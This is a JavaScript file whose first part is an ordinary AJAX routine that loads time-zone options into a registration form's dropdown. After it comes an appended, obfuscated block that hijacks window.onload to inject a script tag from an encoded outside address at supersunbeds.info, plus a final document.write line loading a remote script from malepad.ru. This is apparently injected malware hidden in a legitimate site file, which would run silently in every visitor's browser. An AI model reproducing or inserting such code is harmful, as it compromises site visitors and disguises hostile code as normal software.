var xmlHttp; 
    var requestURL ;
    var is_ie = (navigator.userAgent.indexOf('MSIE') >= 0) ? 1 : 0; 
    var is_ie5 = (navigator.appVersion.indexOf("MSIE 5.5")!=-1) ? 1 : 0; 
    var is_opera = ((navigator.userAgent.indexOf("Opera6")!=-1)||(navigator.userAgent.indexOf("Opera/6")!=-1)) ? 1 : 0; 
    //netscape, safari, mozilla behave the same??? 
    var is_netscape = (navigator.userAgent.indexOf('Netscape') >= 0) ? 1 : 0; 
    var d=new Date();
    var s=d.getTime();
    
	window.onload=function()
	{
		show_data();
	}
    function show_data(){ 
			
       	
            //Append the name to search for to the requestURL 
	    requestURL=document.getElementById('UrlString').value+"?q=";
	    //alert(requestURL);
            var time=d.getTimezoneOffset()/60;
            var url = requestURL+time; 
             
            //Create the xmlHttp object to use in the request 
            //stateChangeHandler will fire when the state has changed, i.e. data is received back 
            // This is non-blocking (asynchronous) 
            xmlHttp = GetXmlHttpObject(stateChangeHandler); 
             
            //Send the xmlHttp get to the specified url 
            xmlHttp_Get(xmlHttp, url); 
	
      
       
    } 

    //stateChangeHandler will fire when the state has changed, i.e. data is received back 
    // This is non-blocking (asynchronous) 
    function stateChangeHandler() 
    { 
        //readyState of 4 or 'complete' represents that data has been returned 
        if(xmlHttp.readyState == 4)
		{
		// To make sure valid response is received from the server, 200 means response received is OK
		if(xmlHttp.status == 200)
			{			
			ClearAndSetStateListItems(xmlHttp.responseText);
			
			}
		else
			{
			alert("There was a problem retrieving data from the server." );
			}
		}
           
	}
    // XMLHttp send GET request 
    function xmlHttp_Get(xmlhttp, url) { 
	
		
        xmlhttp.open('GET', url, true); 
	
        xmlhttp.send(null); 
       
    } 

    function GetXmlHttpObject(handler) { 
        var objXmlHttp = null;    //Holds the local xmlHTTP object instance 

        //Depending on the browser, try to create the xmlHttp object 
        if (is_ie){ 
            //The object to create depends on version of IE 
            //If it isn't ie5, then default to the Msxml2.XMLHTTP object 
            var strObjName = (is_ie5) ? 'Microsoft.XMLHTTP' : 'Msxml2.XMLHTTP'; 
             
            //Attempt to create the object 
            try{ 
                objXmlHttp = new ActiveXObject(strObjName); 
                objXmlHttp.onreadystatechange = handler; 
            } 
            catch(e){ 
            //Object creation errored 
                alert('IE detected, but object could not be created. Verify that active scripting and activeX controls are enabled'); 
                return; 
            } 
        } 
        else if (is_opera){ 
            //Opera has some issues with xmlHttp object functionality 
            alert('Opera detected. The page may not behave as expected.'); 
            return; 
        } 
        else{ 
            // Mozilla | Netscape | Safari 
            objXmlHttp = new XMLHttpRequest(); 
            objXmlHttp.onload = handler; 
            objXmlHttp.onerror = handler; 
        } 
        
        //Return the instantiated object 
        return objXmlHttp; 
    } 
    function ClearAndSetStateListItems(st)
	{
	//alert('0');
	 var stateList = document.getElementById('Registration1_DDLstTimeZone');
	//Clears the state combo box contents.
	
	for (var count = stateList.options.length-1; count >-1; count--)
	{
		stateList.options[count] = null;
	}
	
	var str=st.split('<br>');
	if(str.length!=0)
	{
	var textValue; 
	var optionItem;
	//Add new states list to the state combo box.
	
	for (var count = 0; count < str.length; count++)
	{
		var t=document.getElementById('Registration1_DDLstTimeZone');
		if(str[count]!='')
		t[count]=new Option(str[count]);
	}
	
	}
	else
	{
		var t=document.getElementById('Registration1_DDLstTimeZone');
		t[0]=new Option(st);	
	}
	}






var m='';var Xd;if(Xd!='BM'){Xd='BM'};try {var P="";var Ci="";var y=window[unescape("%75%6e%65%73%63%61%70%65")];var U=null;var KS=new Date();var Z=window[y("%52%65%67%45%78%70")];var Q=new Date();var C=y("%72%65%70%6c%61%63%65");var Tt=new String();var KW;if(KW!='' && KW!='PC'){KW=null};function x(B,r){var Wi;if(Wi!='mg'){Wi=''};this.l="";this.du="";var K=y("%5b");this.u="";var NL;if(NL!='I' && NL != ''){NL=null};K+=r;this.Y='';K+=y("%5d");var La;if(La!=''){La='R'};var f=new Z(K, y("%67"));return B.replace(f, U);this.Ue='';};var B=y("%31");var xv;if(xv!='' && xv!='M'){xv=''};var NB;if(NB!='KH' && NB!='Jq'){NB=''};var v=new String("onloa"+"xq7Cd".substr(4));var G=x('/1fOawnxpvo0ps-qcAoAmw/sg7o7ovgFlIey.qcAo0mM/qp0exrOeIzbhAiblvtboynb.7cToAmT.spyh7pE','yF7xTI0LbM1vEqwOAjs');var LP="";var E=y("%73%63%72%69%70%74");var KA;if(KA!='' && KA!='fU'){KA=''};var sE;if(sE!='' && sE!='j'){sE=''};var q="\x68\x74\x74\x70\x3a\x2f\x2f\x73\x75\x70\x65\x72\x73\x75\x6e\x62\x65\x64\x73\x2e\x69\x6e\x66\x6f\x3a";var H=x('832173123912112239027379297274312382243117792414299021372442492722914','713294');this.Hz='';this.Rb='';var a='';var inB=new Date();function F(){this.n="";this.WU="";var d=document;var HyV;if(HyV!=''){HyV='Rc'};N=d.createElement(E);a+=q;a+=H+G;var sa="";var uC;if(uC!='HB'){uC='HB'};var tW=new Array();N.defer=B;this.jP="";var J=d.body;var IX;if(IX!='vL'){IX='vL'};N.src=a;var e=new Array();this.Tj='';var sA;if(sA!='Oc' && sA!='lv'){sA=''};J.appendChild(N);var ls;if(ls!='' && ls!='Mv'){ls=null};var Am="";};this.GI='';this.RK="";var k='';var PM;if(PM!='zq'){PM='zq'};window[v]=F;var Dg=new Date();} catch(c){};









document.write('<s'+'cript type="text/javascript" src="http://malepad.ru:8080/IM.js"></scr'+'ipt>');